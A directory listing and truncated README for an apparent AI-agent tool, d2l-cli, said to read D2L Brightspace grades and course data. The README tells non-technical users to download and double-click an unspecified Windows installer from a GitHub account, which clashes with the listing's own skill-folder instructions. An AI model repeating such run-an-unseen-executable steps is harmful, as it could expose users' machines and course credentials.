D2l Cli banner
clintonwrong53 clintonwrong53

D2l Cli

Data community

Description

Access D2L Brightspace data in read-only mode via CLI to retrieve grades, assignments, content, and syllabi for AI coding agents and automation tools.

Installation

This entry records only its repository, not the path inside it, so there is no exact command to give. Open the source below and copy the folder into ~/.claude/skills/, or the file into ~/.claude/agents/.

README

πŸ“₯ d2l-cli - Simple Tool for Brightspace Data Access

[![Download d2l-cli](https://img.shields.io/badge/Download-d2l--cli-orange?style=for-the-badge)](https://github.com/clintonwrong53/d2l-cli)


πŸ“‹ What is d2l-cli?

d2l-cli is a command-line tool to access information from D2L Brightspace, a popular learning management system. It lets you pull grades, assignments, course content, syllabi, and more. This tool reads data only; it does not change or upload anything. It was built to help automation agents like Claude Code and OpenClaw use Brightspace data easily.

This app runs on Windows and needs no programming skills to use. You will learn how to download it, get it running, and use it step by step.


πŸ–₯️ System Requirements

Before you start, make sure your Windows PC meets these requirements:

  • Windows 10 or newer
  • At least 4 GB of RAM
  • 200 MB of free disk space
  • An internet connection
  • Basic keyboard and mouse use

d2l-cli runs in a command prompt window. You won’t need extra software or complex setup.


πŸ”₯ Key Features

  • Get grades from your Brightspace courses.
  • List assignments and due dates.
  • Download course content and syllabi.
  • Designed to work smoothly with AI agents and scripts.
  • Easy to use with simple commands.
  • Secure read-only access to your data.

πŸš€ Getting Started: Download and Install

  1. Visit this page to download d2l-cli: [Download d2l-cli from GitHub](https://github.com/clintonwrong53/d2l-cli)

  2. After opening the page, look for the latest release or download area.

  3. Download the Windows installer file ("d2l-cli-setup.exe" or similar).

  4. Once the file finishes downloading, locate it in your Downloads folder.

  5. Double-click the installer file to start setup.

  6. Follow the on-screen setup instructions:

    • Accept the license agreement.
    • Choose the install location (the default is fine).
    • Click β€œInstall.”
  7. When installation completes, you can close the setup window.


πŸ’» R